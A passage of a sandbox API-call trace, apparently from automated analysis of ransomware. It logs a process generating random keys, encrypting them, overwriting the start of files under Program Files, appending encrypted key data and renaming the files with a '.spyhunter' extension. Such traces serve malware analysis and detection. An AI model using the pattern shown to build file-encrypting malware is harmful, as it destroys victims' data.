RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.242] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.spyhunter") returned 90 [0092.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll.spyhunter")) returned 1 [0092.242] GetProcessHeap () returned 0x2c0000 [0092.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.242] GetProcessHeap () returned 0x2c0000 [0092.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.242] GetProcessHeap () returned 0x2c0000 [0092.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdd0 | out: pbBuffer=0x57fdd0) returned 1 [0092.243] GetProcessHeap () returned 0x2c0000 [0092.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdc8*=0x30) returned 1 [0092.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.249] GetProcessHeap () returned 0x2c0000 [0092.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.249] GetProcessHeap () returned 0x2c0000 [0092.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdd0 | out: pbBuffer=0x57fdd0) returned 1 [0092.249] GetProcessHeap () returned 0x2c0000 [0092.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdc8*=0x30) returned 1 [0092.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.250] GetProcessHeap () returned 0x2c0000 [0092.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.251] GetProcessHeap () returned 0x2c0000 [0092.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0092.251] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdc8 | out: pbBuffer=0x57fdc8) returned 1 [0092.251] GetProcessHeap () returned 0x2c0000 [0092.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.251] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdc0*=0x30) returned 1 [0092.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.253] GetProcessHeap () returned 0x2c0000 [0092.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.253] GetProcessHeap () returned 0x2c0000 [0092.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.254] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdc8 | out: pbBuffer=0x57fdc8) returned 1 [0092.254] GetProcessHeap () returned 0x2c0000 [0092.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.254] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdc0*=0x30) returned 1 [0092.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.254] GetProcessHeap () returned 0x2c0000 [0092.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.254] GetProcessHeap () returned 0x2c0000 [0092.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.254] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdc0 | out: pbBuffer=0x57fdc0) returned 1 [0092.254] GetProcessHeap () returned 0x2c0000 [0092.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.254] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdb8*=0x30) returned 1 [0092.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.254] GetProcessHeap () returned 0x2c0000 [0092.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.255] GetProcessHeap () returned 0x2c0000 [0092.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdc0 | out: pbBuffer=0x57fdc0) returned 1 [0092.255] GetProcessHeap () returned 0x2c0000 [0092.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdb8*=0x30) returned 1 [0092.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.255] GetProcessHeap () returned 0x2c0000 [0092.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.255] GetProcessHeap () returned 0x2c0000 [0092.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdb8 | out: pbBuffer=0x57fdb8) returned 1 [0092.255] GetProcessHeap () returned 0x2c0000 [0092.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdb0*=0x30) returned 1 [0092.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdb8 | out: pbBuffer=0x57fdb8) returned 1 [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.256] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdb0*=0x30) returned 1 [0092.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdb0 | out: pbBuffer=0x57fdb0) returned 1 [0092.256] GetProcessHeap () returned 0x2c0000 [0092.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.256] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fda8*=0x30) returned 1 [0092.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0092.257] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdb0 | out: pbBuffer=0x57fdb0) returned 1 [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.257] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fda8*=0x30) returned 1 [0092.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.257] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fda8 | out: pbBuffer=0x57fda8) returned 1 [0092.257] GetProcessHeap () returned 0x2c0000 [0092.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.257] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fda0*=0x30) returned 1 [0092.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.258] GetProcessHeap () returned 0x2c0000 [0092.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.258] GetProcessHeap () returned 0x2c0000 [0092.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.258] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fda8 | out: pbBuffer=0x57fda8) returned 1 [0092.259] GetProcessHeap () returned 0x2c0000 [0092.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fda0*=0x30) returned 1 [0092.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.259] GetProcessHeap () returned 0x2c0000 [0092.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.259] GetProcessHeap () returned 0x2c0000 [0092.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.259] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fda0 | out: pbBuffer=0x57fda0) returned 1 [0092.259] GetProcessHeap () returned 0x2c0000 [0092.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fd98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fd98*=0x30) returned 1 [0092.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.263] GetProcessHeap () returned 0x2c0000 [0092.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.263] GetProcessHeap () returned 0x2c0000 [0092.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cbd8 | out: hHeap=0x2c0000) returned 1 [0092.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fda0 | out: pbBuffer=0x57fda0) returned 1 [0092.264] GetProcessHeap () returned 0x2c0000 [0092.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fd98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fd98*=0x30) returned 1 [0092.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.264] GetProcessHeap () returned 0x2c0000 [0092.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.264] GetProcessHeap () returned 0x2c0000 [0092.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cb18 | out: hHeap=0x2c0000) returned 1 [0092.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd98 | out: pbBuffer=0x57fd98) returned 1 [0092.264] GetProcessHeap () returned 0x2c0000 [0092.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.265] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fd90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fd90*=0x30) returned 1 [0092.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.265] GetProcessHeap () returned 0x2c0000 [0092.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.265] GetProcessHeap () returned 0x2c0000 [0092.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d9a0 | out: hHeap=0x2c0000) returned 1 [0092.265] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd98 | out: pbBuffer=0x57fd98) returned 1 [0092.265] GetProcessHeap () returned 0x2c0000 [0092.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.265] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fd90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fd90*=0x30) returned 1 [0092.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.403] GetProcessHeap () returned 0x2c0000 [0092.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.403] GetProcessHeap () returned 0x2c0000 [0092.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d8d8 | out: hHeap=0x2c0000) returned 1 [0092.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd90 | out: pbBuffer=0x57fd90) returned 1 [0092.415] GetProcessHeap () returned 0x2c0000 [0092.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd88*=0x30) returned 1 [0092.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0092.492] StrStrW (lpFirst="vstoee.dll", lpSrch=".txt") returned 0x0 [0092.492] GetProcessHeap () returned 0x2c0000 [0092.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c11050 [0092.492] ReadFile (in: hFile=0x178, lpBuffer=0x2c11050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesRead=0x57fd4c*=0x2800, lpOverlapped=0x0) returned 1 [0092.536] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.536] WriteFile (in: hFile=0x178, lpBuffer=0x2c11050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesWritten=0x57fd4c*=0x2800, lpOverlapped=0x0) returned 1 [0092.536] GetProcessHeap () returned 0x2c0000 [0092.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.536] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.536] WriteFile (in: hFile=0x178, lpBuffer=0x57fd8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x57fd8c*, lpNumberOfBytesWritten=0x57fd4c*=0x4, lpOverlapped=0x0) returned 1 [0092.621] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57fd4c*=0x30, lpOverlapped=0x0) returned 1 [0092.621] CloseHandle (hObject=0x178) returned 1 [0092.654] GetProcessHeap () returned 0x2c0000 [0092.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0092.654] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.spyhunter") returned 76 [0092.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.spyhunter")) returned 1 [0092.655] GetProcessHeap () returned 0x2c0000 [0092.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.655] GetProcessHeap () returned 0x2c0000 [0092.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.655] GetProcessHeap () returned 0x2c0000 [0092.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0092.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd90 | out: pbBuffer=0x57fd90) returned 1 [0092.655] GetProcessHeap () returned 0x2c0000 [0092.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd88*=0x30) returned 1 [0092.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0092.656] StrStrW (lpFirst="VSTOInstallerUI.dll", lpSrch=".txt") returned 0x0 [0092.656] GetProcessHeap () returned 0x2c0000 [0092.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.656] ReadFile (in: hFile=0x178, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x57fd4c*=0x2760, lpOverlapped=0x0) returned 1 [0092.663] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd8a0, 